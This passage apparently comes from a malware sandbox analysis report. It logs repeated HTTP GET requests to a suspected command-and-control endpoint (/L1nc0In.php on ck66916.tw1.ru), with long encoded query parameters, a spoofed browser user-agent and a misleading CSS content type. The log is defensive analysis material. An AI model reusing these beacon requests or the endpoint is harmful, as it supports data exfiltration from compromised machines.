lW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ru
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIDZwcjY2MmY4I2M4MmMlhTO2YmZlhTZzkTM5ImN4QGMiwiIjJGO1ITO4YGMmJWN1M2Y3MmY5UTMjJDMxQWO2kDM3QmZ4MDN0QjNmJiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: ck66916.tw1.ruConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /L1nc0In.php?Vf4GiMycKu1P2Ut6QrWWpWN770=u3znAABNdhKLsdqJgt6nxh&89fc44b31ec06d13d1704a021fd20ae6=gYzIjZyYmYjNGMjhzMjFDN3ADZ5YTN1MGNmRWM4MGO3IWYxMGZmFmM3EzMxMTMzYzNxYTO5QjM&650a0c21718513cd4feada722441e9dc=QOwcDMihzN4UzY1QGZjFjYiVGNllTZlVzM0UWO3UGNwEzM2czNwADZ&b63e60a5a06f8bfb35615a518869b76a=d1nIlR2NkN2M2UTO4gjN3MzY2MTZ0I2N4YGZ5gDMxUTMiJTM0cTZjRWM3IiOiMmN1IGM3M2YxQGM4QjZ3UjN2AjYlFzN0QTNyYzMwgTNiwiI2cDZjRGNiFTOkJWO0IWO3QTY2UmN3QmY4kzMiNmZlRDMhVmZxAjZ2IiOikjN0gTM0EDMzIGMyUmN5QTNjBzYhVGO0MWZlBzYwMGOis3W&1ee1ab9261adb8cfddd516f369c274e1=QX9JiI6IiMkBzNiZzYihjYzgzYyUGO5YjZmVGOlNTOxkjY2gDZwICLiUGZ3Q2YzYTN5gDO2czMjZzMlRjY3gjZklDOwETNxImMxQzNlNGZxcjI6IyY2UjYwczYjFDZwgDNmdTN2YDMiVWM3QDN1IjNzADO1ICLiYzNkNGZ0IWM5QmY5QjY5cDNhZTZ2cDZihTOzI2YmVGNwEWZmFDMmZjI6ISO2QDOxQTMwMjYwITZ2kDN1MGMjFWZ4QzYlVGMjBzY4Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S0EUeaVHbHN2dWdEZUJUeNBTREl0cWdkW2FTRJJTQTV2csdlYopVRJBTWEJGbS5mYKh2QJZDawI1ZBRkT1lERJFkQD10dZpmTnVlRVRkQp1EcwUkVvVVbjZnTFlEcJZ0SzZ1RkVHbrlkNJNlW0ZUbUZlQxEVa3lWSwlEMSdWREt0ZRVlUFpFMNlEaURVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUaiNTOtJmc1clVp9maJxWNyImNWdlYwJlbJNXSpJ2M50mYyVzVWl2bql0cGdEZ6lzRjl2dplUdkNjY1RXbiZlSp9Uaj12Y2p0QMlGNyQmd1ITY1ZFbJZTS5lld41WSzl0QXllSp9Uar52YwUzVkZnTtl0cJlmYzkTbiJXNXZVavpWS1lzVh5mVtNWa3lWS1R2MiVHdtJmVKl2TptGSkBnTtl0cJlmYzkTbiJXNXZVavpWSsFzVZVnUzMmdo1WSzlUaiNTOtJmc1clVp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETplERNNTRq1UNJl2TpV1VihWNwEVUKNETplkeNVXVq